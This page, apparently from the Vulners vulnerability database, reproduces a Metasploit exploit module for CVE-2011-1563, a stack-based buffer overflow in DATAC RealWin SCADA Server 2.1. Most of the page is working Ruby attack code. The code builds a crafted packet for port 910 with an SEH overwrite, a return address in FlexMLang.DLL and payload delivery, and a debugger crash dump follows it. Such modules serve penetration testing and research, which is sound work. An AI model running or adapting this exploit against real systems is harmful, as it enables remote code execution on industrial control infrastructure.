Lucene search
K

DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow

🗓️ 20 Jun 2011 00:37:13Reported by Luigi Auriemma, MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 41 Views

DATAC RealWin SCADA Server 2.1 buffer overflow via On_FC_BINFILE_FCS_*FILE packet on port 910, allows remote code executio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-1563
29 May 201815:50
circl
Check Point Advisories
RealFlex RealWin Tag Manipulation Buffer Overflow (CVE-2011-1563)
3 May 201100:00
checkpoint_advisories
CVE
CVE-2011-1563
5 Apr 201115:00
cve
Cvelist
CVE-2011-1563
5 Apr 201115:00
cvelist
Metasploit
RealWin SCADA Server DATAC Login Buffer Overflow
22 Jun 201122:36
metasploit
NVD
CVE-2011-1563
5 Apr 201115:19
nvd
OpenVAS
DATAC RealWin SCADA Server On_FC_CONNECT_FCS_a_FILE Buffer Overflow Vulnerability
24 Jun 201100:00
openvas
OpenVAS
ActivDesk < 3.0.1 Multiple Vulnerabilities - Active Check
1 Jul 201100:00
openvas
OpenVAS
DATAC RealWin SCADA Server On_FC_CONNECT_FCS_a_FILE Buffer Overflow Vulnerability
24 Jun 201100:00
openvas
Prion
Stack overflow
5 Apr 201115:19
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability found in DATAC Control International RealWin
        SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE
        packet via port 910, RealWin will try to create a file (which would be saved to
        C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-
        supplied filename with an inline memcpy routine without proper bounds checking, which
        results a stack-based buffer overflow, allowing arbitrary remote code execution.

        Tested version: 2.0 (Build 6.1.8.10)
      },
      'Author'         => [ 'Luigi Auriemma', 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-1563'],
          [ 'OSVDB', '72826'],
          [ 'BID', '46937'],
          [ 'URL', 'http://aluigi.altervista.org/adv/realwin_5-adv.txt' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 450,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Universal', { 'Ret' => 0x4002da21 } ], # P/P/R FlexMLang.DLL 8.1.45.19
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2011-03-21'))

    register_options([Opt::RPORT(910)])
  end

  def exploit

    connect

    data =  [0x67542310].pack('V')
    data << [0x00000824].pack('V')
    data << [0x00100001].pack('V')
    data << [0x00000001].pack('V')  #Packet type
    data << [0x00060000].pack('V')
    data << [0x0000ffff].pack('V')
    data << rand_text_alpha_upper(221)
    data << generate_seh_payload(target.ret)
    data << rand_text_alpha_upper(17706 - payload.encoded.length)
    data << [0x451c3500].pack('V')
    data << [0x00000154].pack('V')
    data << [0x00020040].pack('V')

    print_status("Trying target #{target.name}...")
    sock.put(data)
    select(nil,nil,nil,0.5)

    handler
    disconnect

  end
end


=begin
0:022> r
eax=00000819 ebx=0587f89c ecx=00000039 edx=011fba04 esi=011fc138 edi=0587fffd
eip=0042702f esp=0587f738 ebp=011fba04 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
RealWinDemo+0x2702f:
0042702f f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:022> !exchain
0587f748: RealWinDemo+e0b78 (004e0b78)
0587f9a4: FlexMLang!GetFlexMLangIResourceBrowser+2b991 (4002da21)
Invalid exception stack at 49a206eb
0:022> u 4002da21
FlexMLang!GetFlexMLangIResourceBrowser+0x2b991:
4002da21 5e              pop     esi
4002da22 5b              pop     ebx
4002da23 c3              ret
=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2022 23:22Current
0.4Low risk
Vulners AI Score0.4
CVSS 210
EPSS0.74638
41